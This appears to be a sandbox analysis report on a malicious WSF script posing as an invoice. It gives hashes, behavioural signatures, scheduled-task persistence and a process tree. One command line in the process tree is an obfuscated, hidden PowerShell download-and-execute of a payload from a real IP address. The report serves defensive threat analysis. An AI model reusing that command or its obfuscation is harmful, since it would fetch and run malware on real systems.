Analysis
max time kernel: 128s
max time network: 124s
platform: windows7_x64
resource: win7-20231020-en
resource tags: arch:x64, arch:x86, image:win7-20231020-en, locale:en-us, os:windows7-x64, system
submitted: 15/11/2023, 17:36
Static task: static1
Behavioral task: behavioral1
Sample: 16112023_0136_15112023_Invoice#2356876431.wsf
Resource: win7-20231020-en
General
Target: 16112023_0136_15112023_Invoice#2356876431.wsf
Size: 21KB
MD5: 5d9bc7257648e766a56fa284fc93eb54
SHA1: 5ec96df82f7290ef18b15ce048e2f0cf49af523b
SHA256: ce81111e3d8f1946ce876b32908560f51f3d43ab7e74706649e623462cada292
SHA512: ada4abe483fb6df5422fb96f615e6fc67f08939d3d89a6ff2ad7b3f6e291a613789aa4b89925bbe9c450ba07b5f746dbe62b36cd25c3b28468c41d88fe9f1e06
SSDEEP: 384:taaaaaaaaaaauaaaaaaaaaaaVaaaaaaaaaaal0/OlaaaaaaaaaaaJaaaaaaaaaa9:taaaaaaaaaaauaaaaaaaaaaaVaaaaaaF
Malware Config
Signatures

Blocklisted process makes network request (2 IoCs)
  flow  pid   Process
  3     1684  WScript.exe
  5     1976  powershell.exe

Drops file in System32 directory (1 IoC)
  description                   ioc                                                                                                                    Process
  File opened for modification  C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk  powershell.exe

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: EnumeratesProcesses (2 IoCs)
  pid   Process
  1976  powershell.exe
  2860  powershell.exe

Suspicious use of AdjustPrivilegeToken (2 IoCs)
  description              pid   Process
  Token: SeDebugPrivilege  1976  powershell.exe
  Token: SeDebugPrivilege  2860  powershell.exe

Suspicious use of WriteProcessMemory (12 IoCs)
  description                        pid   Process      procid_target
  PID 1684 wrote to memory of 1976   1684  WScript.exe  28
  PID 1684 wrote to memory of 1976   1684  WScript.exe  28
  PID 1684 wrote to memory of 1976   1684  WScript.exe  28
  PID 2200 wrote to memory of 268    2200  taskeng.exe  34
  PID 2200 wrote to memory of 268    2200  taskeng.exe  34
  PID 2200 wrote to memory of 268    2200  taskeng.exe  34
  PID 268 wrote to memory of 2936    268   WScript.exe  35
  PID 268 wrote to memory of 2936    268   WScript.exe  35
  PID 268 wrote to memory of 2936    268   WScript.exe  35
  PID 2936 wrote to memory of 2860   2936  cmd.exe      37
  PID 2936 wrote to memory of 2860   2936  cmd.exe      37
  PID 2936 wrote to memory of 2860   2936  cmd.exe      37

Uses Task Scheduler COM API (1 TTP)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes

[1] C:\Windows\System32\WScript.exe (PID 1684)
    Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\16112023_0136_15112023_Invoice#2356876431.wsf"
    - Blocklisted process makes network request
    - Suspicious use of WriteProcessMemory

    [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1976)
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='/-/--/-/(''http://185.81.157.213:222/8X.jpg'')'.RePLACe('/-/--/-/','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
        - Blocklisted process makes network request
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

[1] C:\Windows\system32\taskeng.exe (PID 2200)
    Command line: taskeng.exe {04BBFF73-310B-4225-8D31-ECFFDE1F3BAA} S-1-5-21-2084844033-2744876406-2053742436-1000:GGPVHMXR\Admin:Interactive:[1]
    - Suspicious use of WriteProcessMemory

    [2] C:\Windows\System32\WScript.exe (PID 268)
        Command line: C:\Windows\System32\WScript.exe "C:\Users\Public\Conted.vbs"
        - Suspicious use of WriteProcessMemory

        [3] C:\Windows\System32\cmd.exe (PID 2936)
            Command line: cmd /c ""C:\Users\Public\Conted.bat" "
            - Suspicious use of WriteProcessMemory

            [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2860)
                Command line: powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\Conted.ps1'"
                - Drops file in System32 directory
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: ac117302088a7284ccfb6957fc077861
  SHA1: 220d28d0668f1e28ac909561699636c848cd408e
  SHA256: 69154fb9bbdd28ec9c76d63ef9951ccb79ddcf4d37bb7e8d541a350ad979ab80
  SHA512: f71021ad06ea17ddc3f619b196417afd96543a6613ff728038a588ba50651e434c6bb1f3c92f3e9d39fc0b401e7177e7dbcb222bccd93aa2caaca39d631865a4

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZAWLLO1RJ69GAIO7DTX2.temp
  Filesize: 7KB
  MD5: d82ad5696b449dbe82226c731261a824
  SHA1: 385f9e07d795046e2d7ee64a8078166fb5a56326
  SHA256: 0b2fa9154e3620d3417a0adb0f90f530dc5d5866292a5bcaa3fbb50c41563348
  SHA512: 24721b2fb8fd37b0736ff97a6640647d17af6c05c928db8e1b816cda1ce2c706bb6ef53901565af2af44db1f1d289a1567cb39dd65deff7de6297bdc2f605aef

(no path recorded)
  Filesize: 205B
  MD5: 759278dd3dc3679bf7efd1ec681c0aa1
  SHA1: 72b37494696deea940ac75b4c4e06e2b6ce419ef
  SHA256: cba344447d8228d88c93d64ffdcda1de8562ef41adc4901191548e00bbfc5f19
  SHA512: 8b4f63354c5aa1ec4102e7aadbb2da34b2a0ba2d3ae6b8d22a70fd75c3c3b9e70cd4ce8128bd50cb400970697c49810c4ef69f96352e36ba4f2b7a647ab8a27f

(no path recorded)
  Filesize: 688B
  MD5: 110da9d3474ba64fa1a18c173685c25d
  SHA1: 9f093829518a9268bf9807fda7bef47e7832c497
  SHA256: a31dbd6f7416f150403c19be69f02d5e8608f5e7fae88a29831d40db15849b60
  SHA512: ef5fb4415fbd12e633ad964ca132ac3be81bfacd489db788b86fc7ef245d6f51bc08faecaf24874649d0c754b1892075a28042bf8483ab85b1996a25cfa57443